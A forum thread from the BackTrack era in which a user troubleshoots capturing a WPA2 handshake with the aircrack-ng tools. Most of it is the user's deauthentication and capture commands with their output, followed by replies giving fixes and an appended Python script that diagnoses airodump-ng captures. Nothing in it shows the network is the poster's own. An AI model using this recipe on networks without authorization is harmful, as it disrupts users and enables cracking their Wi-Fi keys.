Thread: Can't capture handshake

  1. #1
    Just burned his ISO
    Join Date: Jun 2009
    Posts: 3

    Can't capture handshake

    Hi all,

    I'm currently on BackTrack 4 installed on my HDD.
    I have been trying for 2 days now to get a handshake.

    My steps:

    Code:
    root@bt:~# airmon-ng start wlan0
    
    
    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID     Name
    3981    knetworkmanager
    4025    dhclient
    
    
    Interface       Chipset         Driver
    
    eth1            Intel 2100B     ipw2100
    wlan0           Broadcom        b43 - [phy0]
                                    (monitor mode enabled on mon0)
    airmon-ng wlan0
    Code:
     CH  1 ][ Elapsed: 28 s ][ 2009-06-19 10:01
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:12:BF:F8:3D:02  -83       14        0    0   1  54 . WPA  TKIP   PSK  SNV6520f83d00
     00:17:3F:B7:B1:3E  -87        2        0    0  11  54   WPA2 CCMP   PSK  belkin54g
    
     BSSID              STATION            PWR   Rate   Lost  Packets  Probe
    root@bt:~# airodump-ng -w WPA -c 11 --bssid 00:17:3F:B7:B1:3E wlan0
    Code:
     CH 11 ][ Elapsed: 20 s ][ 2009-06-19 10:03
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:17:3F:B7:B1:3E  -86  54       79        0    0  11  54   WPA2 CCMP   PSK  belkin54g
    
     BSSID              STATION            PWR   Rate   Lost  Packets  Probe
    Code:
    root@bt:~# aireplay-ng -0 10 -a 00:17:3F:B7:B1:3E wlan0
    10:05:47  Waiting for beacon frame (BSSID: 00:17:3F:B7:B1:3E) on channel 11
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    10:05:47  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:48  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:49  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:49  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:50  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:51  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:51  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:52  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:53  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:54  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    and no handshake, I know injection works

    Code:
    root@bt:~# aireplay-ng -9 -a 00:17:3F:B7:B1:3E wlan0
    For information, no action required: Using gettimeofday() instead of /dev/rtc
    10:06:57  Waiting for beacon frame (BSSID: 00:17:3F:B7:B1:3E) on channel 11
    10:07:04  Trying broadcast probe requests...
    10:07:05  Injection is working!
    10:07:06  Found 1 AP
    
    10:07:06  Trying directed probe requests...
    10:07:06  00:17:3F:B7:B1:3E - channel: 11 - 'belkin54g'
    10:07:10  Ping (min/avg/max): 3.199ms/18.740ms/50.933ms Power: -85.86
    10:07:10  30/30:  100%
    What am I missing?

  2. #2
    Junior Member
    Join Date: Jun 2009
    Posts: 30

    From last post

    Code:
     CH 11 ][ Elapsed: 20 s ][ 2009-06-19 10:03
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:17:3F:B7:B1:3E  -86  54       79        0    0  11  54   WPA2 CCMP   PSK  belkin54g
    
     BSSID              STATION            PWR   Rate   Lost  Packets  Probe


    You need to let the #data go up to 10k.

    It should be at least 10000 before even trying to get a handshake.

    The #data will go up as the user is on the web.

    Also, not sure if it matters, but this line is in the wrong order:

    root@bt:~# airodump-ng -w WPA -c 11 --bssid 00:17:3F:B7:B1:3E wlan0

    Should be

    airodump-ng -c 11 -w WPA --bssid 00:17:3F:B7:B1:3E wlan0

    PS. If you wait for the #data to get to 10k I can almost guarantee that you will get the handshake.

    Let me know!

    Sean

  3. #3
    Member imported_vvpalin
    Join Date: Apr 2009
    Posts: 442

    You're using a Broadcom, and that has so many bugs it's not even funny.

    Get a better card and try again; also, the last thing you posted doesn't prove injection is working at all.


    @sbolen28 - I'm hoping you misread his post; if not, you need to do some homework.

    cheers
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  4. #4
    Junior Member
    Join Date: Jun 2009
    Posts: 30

    Yea

    I didn't misread, I'm totally new to BT also.

    I had the same problem with the handshake, and noticed the data was 0 so thought that was his problem.

  5. #5
    Just burned his ISO
    Join Date: Jun 2009
    Posts: 3

    Thx for the replies!

    The data isn't the problem, I tried to get a handshake with 10 000 packets earlier.
    A new card isn't an option for the moment, maybe later.
    I did some good reading (I hope), and found out no clients are connected to the AP.
    I think this is a problem with my wlan card, because there is an AP generating packets like a mofo, without any clients connected (according to my card).
    But on the other side, I have a built-in IPW2100, which normally can monitor, but it doesn't show any clients either. I have like 5 APs floating around, and like never any associated clients... something's wrong.

  6. #6
    Member kazalku
    Join Date: Feb 2009
    Posts: 416

    Quote Originally Posted by roxxor
    Hi all,

    I'm currently on BackTrack 4 installed on my HDD.
    I have been trying for 2 days now to get a handshake.

    My steps:

    Code:
    root@bt:~# airmon-ng start wlan0
    
    
    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID     Name
    3981    knetworkmanager
    4025    dhclient
    
    
    Interface       Chipset         Driver
    
    eth1            Intel 2100B     ipw2100
    wlan0           Broadcom        b43 - [phy0]
                                    (monitor mode enabled on mon0)
    airmon-ng wlan0
    Code:
     CH  1 ][ Elapsed: 28 s ][ 2009-06-19 10:01
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:12:BF:F8:3D:02  -83       14        0    0   1  54 . WPA  TKIP   PSK  SNV6520f83d00
     00:17:3F:B7:B1:3E  -87        2        0    0  11  54   WPA2 CCMP   PSK  belkin54g
    
     BSSID              STATION            PWR   Rate   Lost  Packets  Probe
    root@bt:~# airodump-ng -w WPA -c 11 --bssid 00:17:3F:B7:B1:3E wlan0
    Code:
     CH 11 ][ Elapsed: 20 s ][ 2009-06-19 10:03
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:17:3F:B7:B1:3E  -86  54       79        0    0  11  54   WPA2 CCMP   PSK  belkin54g
    
     BSSID              STATION            PWR   Rate   Lost  Packets  Probe
    Code:
    root@bt:~# aireplay-ng -0 10 -a 00:17:3F:B7:B1:3E wlan0
    10:05:47  Waiting for beacon frame (BSSID: 00:17:3F:B7:B1:3E) on channel 11
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    10:05:47  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:48  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:49  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:49  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:50  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:51  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:51  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:52  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:53  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    10:05:54  Sending DeAuth to broadcast -- BSSID: [00:17:3F:B7:B1:3E]
    and no handshake, I know injection works

    Code:
    root@bt:~# aireplay-ng -9 -a 00:17:3F:B7:B1:3E wlan0
    For information, no action required: Using gettimeofday() instead of /dev/rtc
    10:06:57  Waiting for beacon frame (BSSID: 00:17:3F:B7:B1:3E) on channel 11
    10:07:04  Trying broadcast probe requests...
    10:07:05  Injection is working!
    10:07:06  Found 1 AP
    
    10:07:06  Trying directed probe requests...
    10:07:06  00:17:3F:B7:B1:3E - channel: 11 - 'belkin54g'
    10:07:10  Ping (min/avg/max): 3.199ms/18.740ms/50.933ms Power: -85.86
    10:07:10  30/30:  100%
    What am I missing?

    Let's start from the beginning, shall we?

    Have a look at the RED letters in your post. A few points; you should:
    1) Connect a client, then deauth it (with -1 attack) to get a handshake.
    2) Use mon0 as your interface instead of wlan0 after you enable the monitor mode. So, airmon-ng start wlan0 is correct but after this step, use mon0 in all other commands.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein
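Added example, not code from any post in this thread and not part of aircrack-ng: a small Python checker that parses the airodump-ng screen output quoted above and applies kazalku's two points, whether any station is associated with the target BSSID and whether the capture actually ran on the interface airmon-ng created. The samples inside are copied from the thread, plus one constructed dump with an associated client (the station MAC 00:11:22:33:44:55 is a placeholder). The #Data counter is reported only as a sign of client activity: the 4-way handshake is transmitted when a client (re)authenticates to the AP, so with no associated station there is nothing for airodump-ng to record, however long it runs.

```python
"""Diagnose an airodump-ng capture that never shows a WPA handshake.

Added example for this thread, not code from any post or from aircrack-ng.
It parses the text airodump-ng prints (the layout shown above) and applies
kazalku's two checks: is any station associated with the target BSSID, and
was the interface airmon-ng created (mon0) actually used for the capture.
"""
import re

MAC_TOKEN = re.compile(r"^(?:[0-9A-F]{2}:){5}[0-9A-F]{2}$", re.I)
AUTH_VALUES = {"PSK", "MGT"}

# Constructed samples: AIRMON_OUT and DUMP_NO_CLIENT are copied from the thread;
# DUMP_WITH_CLIENT is made up (station MAC 00:11:22:33:44:55 is a placeholder).
AIRMON_OUT = """\
Interface       Chipset         Driver
eth1            Intel 2100B     ipw2100
wlan0           Broadcom        b43 - [phy0]
                                (monitor mode enabled on mon0)
"""
DUMP_NO_CLIENT = """\
 CH 11 ][ Elapsed: 20 s ][ 2009-06-19 10:03

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:17:3F:B7:B1:3E  -86  54       79        0    0  11  54   WPA2 CCMP   PSK  belkin54g

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe
"""
DUMP_WITH_CLIENT = """\
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:17:3F:B7:B1:3E  -86  54      312       37    2  11  54   WPA2 CCMP   PSK  belkin54g

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe
 (not associated)   00:AA:BB:CC:DD:EE  -80    0 - 1      0        3  someothernet
 00:17:3F:B7:B1:3E  00:11:22:33:44:55  -72   54-54      0       41
"""


def essid_from(tokens):
    """ESSID is everything after the AUTH column (keeps ESSIDs with spaces)."""
    for i, tok in enumerate(tokens):
        if tok in AUTH_VALUES:
            return " ".join(tokens[i + 1:])
    return tokens[-1]  # open networks print no AUTH value


def parse_airodump(text):
    """Return (aps, stations) parsed from airodump-ng screen output."""
    aps, stations, section, has_rxq = [], [], None, False
    for line in text.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        if tokens[0] == "BSSID":  # a column header starts a new section
            section = "stations" if "STATION" in tokens else "aps"
            has_rxq = "RXQ" in tokens  # RXQ only appears with a channel lock (-c)
            continue
        if section == "aps" and MAC_TOKEN.match(tokens[0]):
            off = 3 if has_rxq else 2  # index of the Beacons column
            aps.append({"bssid": tokens[0].upper(), "beacons": int(tokens[off]),
                        "data": int(tokens[off + 1]), "essid": essid_from(tokens)})
        elif section == "stations":
            if tokens[:2] == ["(not", "associated)"]:
                tokens = [None] + tokens[2:]  # probing station, no AP
            if len(tokens) > 1 and MAC_TOKEN.match(tokens[1]) and \
                    (tokens[0] is None or MAC_TOKEN.match(tokens[0])):
                stations.append({"bssid": tokens[0] and tokens[0].upper(),
                                 "station": tokens[1].upper()})
    return aps, stations


def monitor_interface(airmon_output):
    """Interface airmon-ng reports monitor mode on, or None."""
    m = re.search(r"monitor mode enabled on (\S+)\)", airmon_output)
    return m.group(1) if m else None


def diagnose(dump_text, target_bssid, capture_iface, airmon_output=""):
    """Return (code, message) pairs; an empty list means a handshake is plausible."""
    aps, stations = parse_airodump(dump_text)
    target, findings = target_bssid.upper(), []
    ap = next((a for a in aps if a["bssid"] == target), None)
    if ap is None:
        findings.append(("NOT_SEEN", f"{target} is not in this dump; check the channel"))
    elif ap["data"] == 0:
        findings.append(("NO_DATA", f"no data frames from {ap['essid']}: no active client"))
    if not any(s["bssid"] == target for s in stations):
        findings.append(("NO_CLIENT", "no station is associated with the target; the "
                         "4-way handshake only occurs when a client (re)authenticates"))
    mon = monitor_interface(airmon_output)
    if mon and capture_iface != mon:
        findings.append(("WRONG_IFACE", f"captured on {capture_iface}, monitor mode is on {mon}"))
    return findings


if __name__ == "__main__":
    print(diagnose(DUMP_NO_CLIENT, "00:17:3F:B7:B1:3E", "wlan0", AIRMON_OUT))
    print(diagnose(DUMP_WITH_CLIENT, "00:17:3F:B7:B1:3E", "mon0", AIRMON_OUT))
```

Run as-is, the thread's own dump is flagged NO_DATA, NO_CLIENT and WRONG_IFACE, while the constructed dump with an associated client on mon0 comes back clean. The parser works on whitespace-split tokens rather than fixed columns, so it tolerates the extra RXQ column airodump-ng adds once a channel is locked with -c, and it does not count "(not associated)" stations as clients of the target.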
